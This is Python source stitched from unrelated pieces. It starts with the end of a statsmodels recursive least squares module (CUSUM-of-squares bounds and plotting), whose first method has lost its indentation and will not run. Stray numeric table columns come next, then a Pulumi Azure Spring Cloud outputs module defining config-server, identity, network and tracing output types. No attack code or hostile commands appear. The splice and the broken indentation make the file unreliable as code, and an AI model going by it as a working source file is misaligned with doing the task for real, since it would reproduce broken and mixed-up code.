Comparing against the cusum6 package for Stata, this does not produce
exactly the same confidence bands (which are produced in cusum6 by
lww, uww) because they use a different method for computing the
critical value; in particular, they use tabled values from
Table C, pp. 364-365 of "The Econometric Analysis of Time Series"
Harvey, (1990), and use the value given to 99 observations for any
larger number of observations. In contrast, we use the approximating
critical values suggested in Edgerton and Wells (1994) which allows
computing relatively good approximations for any number of
observations.
"""
# Get the approximate critical value associated with the significance
# level
d = max(self.nobs_diffuse, self.loglikelihood_burn)
n = 0.5 * (self.nobs - d) - 1
try:
ix = [0.1, 0.05, 0.025, 0.01, 0.005].index(alpha / 2)
except ValueError:
raise ValueError('Invalid significance level.')
scalars = _cusum_squares_scalars[:, ix]
crit = scalars[0] / n**0.5 + scalars[1] / n + scalars[2] / n**1.5
# Get the points for the significance bound lines
if points is None:
points = np.array([d, self.nobs])
line = (points - d) / (self.nobs - d)
return line - crit, line + crit
    def plot_cusum_squares(self, alpha=0.05, legend_loc='upper left',
                           fig=None, figsize=None):
        r"""
        Plot the CUSUM of squares statistic and significance bounds.

        Parameters
        ----------
        alpha : float, optional
            The plotted significance bounds are alpha %.
        legend_loc : string, optional
            The location of the legend in the plot. Default is upper left.
        fig : Matplotlib Figure instance, optional
            If given, subplots are created in this figure instead of in a new
            figure. Note that the grid will be created in the provided
            figure using `fig.add_subplot()`.
        figsize : tuple, optional
            If a figure is created, this argument allows specifying a size.
            The tuple is (width, height).

        Returns
        -------
        fig : Matplotlib Figure instance

        Notes
        -----
        Evidence of parameter instability may be found if the CUSUM of squares
        statistic moves out of the significance bounds.
        Critical values used in creating the significance bounds are computed
        using the approximate formula of [1]_.

        References
        ----------
        .. [*] <NAME>., <NAME>, and <NAME>. 1975.
           "Techniques for Testing the Constancy of
           Regression Relationships over Time."
           Journal of the Royal Statistical Society.
           Series B (Methodological) 37 (2): 149-92.
        .. [1] Edgerton, David, and <NAME>. 1994.
           "Critical Values for the Cusumsq Statistic
           in Medium and Large Sized Samples."
           Oxford Bulletin of Economics and Statistics 56 (3): 355-65.
        """
        # Create the plot
        from statsmodels.graphics.utils import _import_mpl, create_mpl_fig
        plt = _import_mpl()  # NOTE(review): unused; called for the mpl check
        fig = create_mpl_fig(fig, figsize)
        ax = fig.add_subplot(1, 1, 1)
        # Get dates, if applicable
        if hasattr(self.data, 'dates') and self.data.dates is not None:
            dates = self.data.dates._mpl_repr()
        else:
            dates = np.arange(self.nobs)
        # Number of initial (diffuse / burned) observations excluded
        d = max(self.nobs_diffuse, self.loglikelihood_burn)
        # Plot cusum-of-squares series and its null reference line (linear
        # from 0 to 1 over the retained sample)
        ax.plot(dates[d:], self.cusum_squares, label='CUSUM of squares')
        ref_line = (np.arange(d, self.nobs) - d) / (self.nobs - d)
        ax.plot(dates[d:], ref_line, 'k', alpha=0.3)
        # Plot significance bounds (straight lines, so two endpoints suffice)
        lower_line, upper_line = self._cusum_squares_significance_bounds(alpha)
        ax.plot([dates[d], dates[-1]], upper_line, 'k--',
                label='%d%% significance' % (alpha * 100))
        ax.plot([dates[d], dates[-1]], lower_line, 'k--')
        ax.legend(loc=legend_loc)
        return fig
class RecursiveLSResultsWrapper(MLEResultsWrapper):
_attrs = {}
_wrap_attrs = wrap.union_dicts(MLEResultsWrapper._wrap_attrs,
_attrs)
_methods = {}
_wrap_methods = wrap.union_dicts(MLEResultsWrapper._wrap_methods,
_methods)
wrap.populate_wrapper(RecursiveLSResultsWrapper, RecursiveLSResults) | 0.923589 | 0.454654 |
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'SpringCloudAppIdentity',
'SpringCloudAppPersistentDisk',
'SpringCloudServiceConfigServerGitSetting',
'SpringCloudServiceConfigServerGitSettingHttpBasicAuth',
'SpringCloudServiceConfigServerGitSettingRepository',
'SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth',
'SpringCloudServiceConfigServerGitSettingRepositorySshAuth',
'SpringCloudServiceConfigServerGitSettingSshAuth',
'SpringCloudServiceNetwork',
'SpringCloudServiceRequiredNetworkTrafficRule',
'SpringCloudServiceTrace',
'GetSpringCloudAppIdentityResult',
'GetSpringCloudAppPersistentDiskResult',
'GetSpringCloudServiceConfigServerGitSettingResult',
'GetSpringCloudServiceConfigServerGitSettingHttpBasicAuthResult',
'GetSpringCloudServiceConfigServerGitSettingRepositoryResult',
'GetSpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthResult',
'GetSpringCloudServiceConfigServerGitSettingRepositorySshAuthResult',
'GetSpringCloudServiceConfigServerGitSettingSshAuthResult',
'GetSpringCloudServiceRequiredNetworkTrafficRuleResult',
]
@pulumi.output_type
class SpringCloudAppIdentity(dict):
    """Managed Service Identity attached to a Spring Cloud Application."""

    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys -> snake_case property names.
        suggest = {
            "principalId": "principal_id",
            "tenantId": "tenant_id",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudAppIdentity. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudAppIdentity.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudAppIdentity.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 principal_id: Optional[str] = None,
                 tenant_id: Optional[str] = None,
                 type: Optional[str] = None):
        """
        :param str principal_id: The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
        :param str tenant_id: The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
        :param str type: Specifies the identity type of the Spring Cloud Application. Possible value is `SystemAssigned`.
        """
        # Every field is optional; store only the ones that were supplied.
        for _key, _value in (("principal_id", principal_id),
                             ("tenant_id", tenant_id),
                             ("type", type)):
            if _value is not None:
                pulumi.set(__self__, _key, _value)

    @property
    @pulumi.getter(name="principalId")
    def principal_id(self) -> Optional[str]:
        """The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application."""
        return pulumi.get(self, "principal_id")

    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> Optional[str]:
        """The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application."""
        return pulumi.get(self, "tenant_id")

    @property
    @pulumi.getter
    def type(self) -> Optional[str]:
        """Specifies the identity type of the Spring Cloud Application. Possible value is `SystemAssigned`."""
        return pulumi.get(self, "type")
@pulumi.output_type
class SpringCloudAppPersistentDisk(dict):
    """Persistent disk configuration for a Spring Cloud Application."""

    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys -> snake_case property names.
        suggest = {
            "sizeInGb": "size_in_gb",
            "mountPath": "mount_path",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudAppPersistentDisk. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudAppPersistentDisk.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudAppPersistentDisk.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 size_in_gb: int,
                 mount_path: Optional[str] = None):
        """
        :param int size_in_gb: Specifies the size of the persistent disk in GB. Possible values are between `0` and `50`.
        :param str mount_path: Specifies the mount path of the persistent disk. Defaults to `/persistent`.
        """
        pulumi.set(__self__, "size_in_gb", size_in_gb)
        if mount_path is not None:
            pulumi.set(__self__, "mount_path", mount_path)

    @property
    @pulumi.getter(name="sizeInGb")
    def size_in_gb(self) -> int:
        """Specifies the size of the persistent disk in GB. Possible values are between `0` and `50`."""
        return pulumi.get(self, "size_in_gb")

    @property
    @pulumi.getter(name="mountPath")
    def mount_path(self) -> Optional[str]:
        """Specifies the mount path of the persistent disk. Defaults to `/persistent`."""
        return pulumi.get(self, "mount_path")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSetting(dict):
    """Git-backed Config Server settings for a Spring Cloud Service."""

    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys -> snake_case property names.
        suggest = {
            "httpBasicAuth": "http_basic_auth",
            "searchPaths": "search_paths",
            "sshAuth": "ssh_auth",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSetting. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceConfigServerGitSetting.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudServiceConfigServerGitSetting.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 uri: str,
                 http_basic_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingHttpBasicAuth'] = None,
                 label: Optional[str] = None,
                 repositories: Optional[Sequence['outputs.SpringCloudServiceConfigServerGitSettingRepository']] = None,
                 search_paths: Optional[Sequence[str]] = None,
                 ssh_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingSshAuth'] = None):
        """
        :param str uri: The URI of the default Git repository used as the Config Server back end, should be started with `http://`, `https://`, `git@`, or `ssh://`.
        :param 'SpringCloudServiceConfigServerGitSettingHttpBasicAuthArgs' http_basic_auth: A `http_basic_auth` block as defined below.
        :param str label: The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
        :param Sequence['SpringCloudServiceConfigServerGitSettingRepositoryArgs'] repositories: One or more `repository` blocks as defined below.
        :param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
        :param 'SpringCloudServiceConfigServerGitSettingSshAuthArgs' ssh_auth: A `ssh_auth` block as defined below.
        """
        pulumi.set(__self__, "uri", uri)
        # Optional settings are stored only when supplied.
        for _key, _value in (("http_basic_auth", http_basic_auth),
                             ("label", label),
                             ("repositories", repositories),
                             ("search_paths", search_paths),
                             ("ssh_auth", ssh_auth)):
            if _value is not None:
                pulumi.set(__self__, _key, _value)

    @property
    @pulumi.getter
    def uri(self) -> str:
        """The URI of the default Git repository used as the Config Server back end, should be started with `http://`, `https://`, `git@`, or `ssh://`."""
        return pulumi.get(self, "uri")

    @property
    @pulumi.getter(name="httpBasicAuth")
    def http_basic_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingHttpBasicAuth']:
        """A `http_basic_auth` block as defined below."""
        return pulumi.get(self, "http_basic_auth")

    @property
    @pulumi.getter
    def label(self) -> Optional[str]:
        """The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository."""
        return pulumi.get(self, "label")

    @property
    @pulumi.getter
    def repositories(self) -> Optional[Sequence['outputs.SpringCloudServiceConfigServerGitSettingRepository']]:
        """One or more `repository` blocks as defined below."""
        return pulumi.get(self, "repositories")

    @property
    @pulumi.getter(name="searchPaths")
    def search_paths(self) -> Optional[Sequence[str]]:
        """An array of strings used to search subdirectories of the Git repository."""
        return pulumi.get(self, "search_paths")

    @property
    @pulumi.getter(name="sshAuth")
    def ssh_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingSshAuth']:
        """A `ssh_auth` block as defined below."""
        return pulumi.get(self, "ssh_auth")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingHttpBasicAuth(dict):
    """HTTP Basic Authentication credentials for the default Config Server Git repository."""

    def __init__(__self__, *,
                 password: str,
                 username: str):
        """
        :param str password: The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        :param str username: The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter
    def password(self) -> str:
        """The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication."""
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def username(self) -> str:
        """The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication."""
        return pulumi.get(self, "username")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepository(dict):
    """An additional named repository of the Git-backed Config Server."""

    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys -> snake_case property names.
        suggest = {
            "httpBasicAuth": "http_basic_auth",
            "searchPaths": "search_paths",
            "sshAuth": "ssh_auth",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingRepository. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceConfigServerGitSettingRepository.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudServiceConfigServerGitSettingRepository.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 name: str,
                 uri: str,
                 http_basic_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth'] = None,
                 label: Optional[str] = None,
                 patterns: Optional[Sequence[str]] = None,
                 search_paths: Optional[Sequence[str]] = None,
                 ssh_auth: Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositorySshAuth'] = None):
        """
        :param str name: A name to identify on the Git repository, required only if repos exists.
        :param str uri: The URI of the Git repository that's used as the Config Server back end should be started with `http://`, `https://`, `git@`, or `ssh://`.
        :param 'SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuthArgs' http_basic_auth: A `http_basic_auth` block as defined below.
        :param str label: The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository.
        :param Sequence[str] patterns: An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards.
        :param Sequence[str] search_paths: An array of strings used to search subdirectories of the Git repository.
        :param 'SpringCloudServiceConfigServerGitSettingRepositorySshAuthArgs' ssh_auth: A `ssh_auth` block as defined below.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "uri", uri)
        # Optional settings are stored only when supplied.
        for _key, _value in (("http_basic_auth", http_basic_auth),
                             ("label", label),
                             ("patterns", patterns),
                             ("search_paths", search_paths),
                             ("ssh_auth", ssh_auth)):
            if _value is not None:
                pulumi.set(__self__, _key, _value)

    @property
    @pulumi.getter
    def name(self) -> str:
        """A name to identify on the Git repository, required only if repos exists."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def uri(self) -> str:
        """The URI of the Git repository that's used as the Config Server back end should be started with `http://`, `https://`, `git@`, or `ssh://`."""
        return pulumi.get(self, "uri")

    @property
    @pulumi.getter(name="httpBasicAuth")
    def http_basic_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth']:
        """A `http_basic_auth` block as defined below."""
        return pulumi.get(self, "http_basic_auth")

    @property
    @pulumi.getter
    def label(self) -> Optional[str]:
        """The default label of the Git repository, should be the branch name, tag name, or commit-id of the repository."""
        return pulumi.get(self, "label")

    @property
    @pulumi.getter
    def patterns(self) -> Optional[Sequence[str]]:
        """An array of strings used to match an application name. For each pattern, use the `{application}/{profile}` format with wildcards."""
        return pulumi.get(self, "patterns")

    @property
    @pulumi.getter(name="searchPaths")
    def search_paths(self) -> Optional[Sequence[str]]:
        """An array of strings used to search subdirectories of the Git repository."""
        return pulumi.get(self, "search_paths")

    @property
    @pulumi.getter(name="sshAuth")
    def ssh_auth(self) -> Optional['outputs.SpringCloudServiceConfigServerGitSettingRepositorySshAuth']:
        """A `ssh_auth` block as defined below."""
        return pulumi.get(self, "ssh_auth")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepositoryHttpBasicAuth(dict):
    """HTTP Basic Authentication credentials for an additional Config Server Git repository."""

    def __init__(__self__, *,
                 password: str,
                 username: str):
        """
        :param str password: The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        :param str username: The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication.
        """
        pulumi.set(__self__, "password", password)
        pulumi.set(__self__, "username", username)

    @property
    @pulumi.getter
    def password(self) -> str:
        """The password used to access the Git repository server, required when the Git repository server supports Http Basic Authentication."""
        return pulumi.get(self, "password")

    @property
    @pulumi.getter
    def username(self) -> str:
        """The username that's used to access the Git repository server, required when the Git repository server supports Http Basic Authentication."""
        return pulumi.get(self, "username")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingRepositorySshAuth(dict):
    """SSH authentication settings for an additional Config Server Git repository."""

    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys -> snake_case property names.
        suggest = {
            "privateKey": "private_key",
            "hostKey": "host_key",
            "hostKeyAlgorithm": "host_key_algorithm",
            "strictHostKeyCheckingEnabled": "strict_host_key_checking_enabled",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingRepositorySshAuth. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceConfigServerGitSettingRepositorySshAuth.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudServiceConfigServerGitSettingRepositorySshAuth.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 private_key: str,
                 host_key: Optional[str] = None,
                 host_key_algorithm: Optional[str] = None,
                 strict_host_key_checking_enabled: Optional[bool] = None):
        """
        :param str private_key: The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
        :param str host_key: The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
        :param str host_key_algorithm: The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
        :param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
        """
        pulumi.set(__self__, "private_key", private_key)
        # Optional settings are stored only when supplied.
        for _key, _value in (("host_key", host_key),
                             ("host_key_algorithm", host_key_algorithm),
                             ("strict_host_key_checking_enabled", strict_host_key_checking_enabled)):
            if _value is not None:
                pulumi.set(__self__, _key, _value)

    @property
    @pulumi.getter(name="privateKey")
    def private_key(self) -> str:
        """The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`."""
        return pulumi.get(self, "private_key")

    @property
    @pulumi.getter(name="hostKey")
    def host_key(self) -> Optional[str]:
        """The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`."""
        return pulumi.get(self, "host_key")

    @property
    @pulumi.getter(name="hostKeyAlgorithm")
    def host_key_algorithm(self) -> Optional[str]:
        """The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists."""
        return pulumi.get(self, "host_key_algorithm")

    @property
    @pulumi.getter(name="strictHostKeyCheckingEnabled")
    def strict_host_key_checking_enabled(self) -> Optional[bool]:
        """Indicates whether the Config Server instance will fail to start if the host_key does not match."""
        return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class SpringCloudServiceConfigServerGitSettingSshAuth(dict):
    """SSH authentication settings for the default Config Server Git repository."""

    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys -> snake_case property names.
        suggest = {
            "privateKey": "private_key",
            "hostKey": "host_key",
            "hostKeyAlgorithm": "host_key_algorithm",
            "strictHostKeyCheckingEnabled": "strict_host_key_checking_enabled",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceConfigServerGitSettingSshAuth. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceConfigServerGitSettingSshAuth.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudServiceConfigServerGitSettingSshAuth.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 private_key: str,
                 host_key: Optional[str] = None,
                 host_key_algorithm: Optional[str] = None,
                 strict_host_key_checking_enabled: Optional[bool] = None):
        """
        :param str private_key: The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`.
        :param str host_key: The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`.
        :param str host_key_algorithm: The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists.
        :param bool strict_host_key_checking_enabled: Indicates whether the Config Server instance will fail to start if the host_key does not match.
        """
        pulumi.set(__self__, "private_key", private_key)
        # Optional settings are stored only when supplied.
        for _key, _value in (("host_key", host_key),
                             ("host_key_algorithm", host_key_algorithm),
                             ("strict_host_key_checking_enabled", strict_host_key_checking_enabled)):
            if _value is not None:
                pulumi.set(__self__, _key, _value)

    @property
    @pulumi.getter(name="privateKey")
    def private_key(self) -> str:
        """The SSH private key to access the Git repository, required when the URI starts with `git@` or `ssh://`."""
        return pulumi.get(self, "private_key")

    @property
    @pulumi.getter(name="hostKey")
    def host_key(self) -> Optional[str]:
        """The host key of the Git repository server, should not include the algorithm prefix as covered by `host-key-algorithm`."""
        return pulumi.get(self, "host_key")

    @property
    @pulumi.getter(name="hostKeyAlgorithm")
    def host_key_algorithm(self) -> Optional[str]:
        """The host key algorithm, should be `ssh-dss`, `ssh-rsa`, `ecdsa-sha2-nistp256`, `ecdsa-sha2-nistp384`, or `ecdsa-sha2-nistp521`. Required only if `host-key` exists."""
        return pulumi.get(self, "host_key_algorithm")

    @property
    @pulumi.getter(name="strictHostKeyCheckingEnabled")
    def strict_host_key_checking_enabled(self) -> Optional[bool]:
        """Indicates whether the Config Server instance will fail to start if the host_key does not match."""
        return pulumi.get(self, "strict_host_key_checking_enabled")
@pulumi.output_type
class SpringCloudServiceNetwork(dict):
    """Virtual-network injection settings for a Spring Cloud Service."""

    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys -> snake_case property names.
        suggest = {
            "appSubnetId": "app_subnet_id",
            "cidrRanges": "cidr_ranges",
            "serviceRuntimeSubnetId": "service_runtime_subnet_id",
            "appNetworkResourceGroup": "app_network_resource_group",
            "serviceRuntimeNetworkResourceGroup": "service_runtime_network_resource_group",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceNetwork. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceNetwork.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudServiceNetwork.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 app_subnet_id: str,
                 cidr_ranges: Sequence[str],
                 service_runtime_subnet_id: str,
                 app_network_resource_group: Optional[str] = None,
                 service_runtime_network_resource_group: Optional[str] = None):
        """
        :param str app_subnet_id: Specifies the ID of the Subnet which should host the Spring Boot Applications deployed in this Spring Cloud Service. Changing this forces a new resource to be created.
        :param Sequence[str] cidr_ranges: A list of (at least 3) CIDR ranges (at least /16) which are used to host the Spring Cloud infrastructure, which must not overlap with any existing CIDR ranges in the Subnet. Changing this forces a new resource to be created.
        :param str service_runtime_subnet_id: Specifies the ID of the Subnet where the Service Runtime components of the Spring Cloud Service will exist. Changing this forces a new resource to be created.
        :param str app_network_resource_group: Specifies the Name of the resource group containing network resources of Azure Spring Cloud Apps. Changing this forces a new resource to be created.
        :param str service_runtime_network_resource_group: Specifies the Name of the resource group containing network resources of Azure Spring Cloud Service Runtime. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "app_subnet_id", app_subnet_id)
        pulumi.set(__self__, "cidr_ranges", cidr_ranges)
        pulumi.set(__self__, "service_runtime_subnet_id", service_runtime_subnet_id)
        # Optional settings are stored only when supplied.
        if app_network_resource_group is not None:
            pulumi.set(__self__, "app_network_resource_group", app_network_resource_group)
        if service_runtime_network_resource_group is not None:
            pulumi.set(__self__, "service_runtime_network_resource_group", service_runtime_network_resource_group)

    @property
    @pulumi.getter(name="appSubnetId")
    def app_subnet_id(self) -> str:
        """Specifies the ID of the Subnet which should host the Spring Boot Applications deployed in this Spring Cloud Service. Changing this forces a new resource to be created."""
        return pulumi.get(self, "app_subnet_id")

    @property
    @pulumi.getter(name="cidrRanges")
    def cidr_ranges(self) -> Sequence[str]:
        """A list of (at least 3) CIDR ranges (at least /16) which are used to host the Spring Cloud infrastructure, which must not overlap with any existing CIDR ranges in the Subnet. Changing this forces a new resource to be created."""
        return pulumi.get(self, "cidr_ranges")

    @property
    @pulumi.getter(name="serviceRuntimeSubnetId")
    def service_runtime_subnet_id(self) -> str:
        """Specifies the ID of the Subnet where the Service Runtime components of the Spring Cloud Service will exist. Changing this forces a new resource to be created."""
        return pulumi.get(self, "service_runtime_subnet_id")

    @property
    @pulumi.getter(name="appNetworkResourceGroup")
    def app_network_resource_group(self) -> Optional[str]:
        """Specifies the Name of the resource group containing network resources of Azure Spring Cloud Apps. Changing this forces a new resource to be created."""
        return pulumi.get(self, "app_network_resource_group")

    @property
    @pulumi.getter(name="serviceRuntimeNetworkResourceGroup")
    def service_runtime_network_resource_group(self) -> Optional[str]:
        """Specifies the Name of the resource group containing network resources of Azure Spring Cloud Service Runtime. Changing this forces a new resource to be created."""
        return pulumi.get(self, "service_runtime_network_resource_group")
@pulumi.output_type
class SpringCloudServiceRequiredNetworkTrafficRule(dict):
    """A network traffic rule required by a VNet-injected Spring Cloud Service."""

    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys -> snake_case property names.
        suggest = None
        if key == "ipAddresses":
            suggest = "ip_addresses"

        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceRequiredNetworkTrafficRule. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceRequiredNetworkTrafficRule.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudServiceRequiredNetworkTrafficRule.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 direction: Optional[str] = None,
                 fqdns: Optional[Sequence[str]] = None,
                 ip_addresses: Optional[Sequence[str]] = None,
                 port: Optional[int] = None,
                 protocol: Optional[str] = None):
        """
        :param str direction: The direction of required traffic. Possible values are `Inbound`, `Outbound`.
        :param Sequence[str] fqdns: The FQDN list of required traffic.
        :param Sequence[str] ip_addresses: The IP list of required traffic.
        :param int port: The port of required traffic.
        :param str protocol: The protocol of required traffic.
        """
        # Every field is optional; store only the ones that were supplied.
        if direction is not None:
            pulumi.set(__self__, "direction", direction)
        if fqdns is not None:
            pulumi.set(__self__, "fqdns", fqdns)
        if ip_addresses is not None:
            pulumi.set(__self__, "ip_addresses", ip_addresses)
        if port is not None:
            pulumi.set(__self__, "port", port)
        if protocol is not None:
            pulumi.set(__self__, "protocol", protocol)

    @property
    @pulumi.getter
    def direction(self) -> Optional[str]:
        """
        The direction of required traffic. Possible values are `Inbound`, `Outbound`.
        """
        return pulumi.get(self, "direction")

    @property
    @pulumi.getter
    def fqdns(self) -> Optional[Sequence[str]]:
        """
        The FQDN list of required traffic.
        """
        return pulumi.get(self, "fqdns")

    @property
    @pulumi.getter(name="ipAddresses")
    def ip_addresses(self) -> Optional[Sequence[str]]:
        """
        The IP list of required traffic.
        """
        return pulumi.get(self, "ip_addresses")

    @property
    @pulumi.getter
    def port(self) -> Optional[int]:
        """
        The port of required traffic.
        """
        return pulumi.get(self, "port")

    @property
    @pulumi.getter
    def protocol(self) -> Optional[str]:
        """
        The protocol of required traffic.
        """
        return pulumi.get(self, "protocol")
@pulumi.output_type
class SpringCloudServiceTrace(dict):
    """Application Insights tracing configuration for a Spring Cloud Service."""

    @staticmethod
    def __key_warning(key: str):
        # camelCase wire keys -> snake_case property names.
        suggest = {
            "instrumentationKey": "instrumentation_key",
            "sampleRate": "sample_rate",
        }.get(key)
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SpringCloudServiceTrace. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SpringCloudServiceTrace.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        SpringCloudServiceTrace.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 instrumentation_key: str,
                 sample_rate: Optional[float] = None):
        """
        :param str instrumentation_key: The Instrumentation Key used for Application Insights.
        :param float sample_rate: The sampling rate of Application Insights Agent. Must be between `0.0` and `100.0`. Defaults to `10.0`.
        """
        pulumi.set(__self__, "instrumentation_key", instrumentation_key)
        if sample_rate is not None:
            pulumi.set(__self__, "sample_rate", sample_rate)

    @property
    @pulumi.getter(name="instrumentationKey")
    def instrumentation_key(self) -> str:
        """The Instrumentation Key used for Application Insights."""
        return pulumi.get(self, "instrumentation_key")

    @property
    @pulumi.getter(name="sampleRate")
    def sample_rate(self) -> Optional[float]:
        """The sampling rate of Application Insights Agent. Must be between `0.0` and `100.0`. Defaults to `10.0`."""
        return pulumi.get(self, "sample_rate")
@pulumi.output_type
class GetSpringCloudAppIdentityResult(dict):
    """Data-source result describing the Managed Service Identity of a Spring Cloud Application."""

    def __init__(__self__, *,
                 principal_id: str,
                 tenant_id: str,
                 type: str):
        """
        :param str principal_id: The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
        :param str tenant_id: The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application.
        :param str type: The Type of Managed Identity assigned to the Spring Cloud Application.
        """
        pulumi.set(__self__, "principal_id", principal_id)
        pulumi.set(__self__, "tenant_id", tenant_id)
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter(name="principalId")
    def principal_id(self) -> str:
        """The Principal ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application."""
        return pulumi.get(self, "principal_id")

    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> str:
        """The Tenant ID for the Service Principal associated with the Managed Service Identity of this Spring Cloud Application."""
        return pulumi.get(self, "tenant_id")

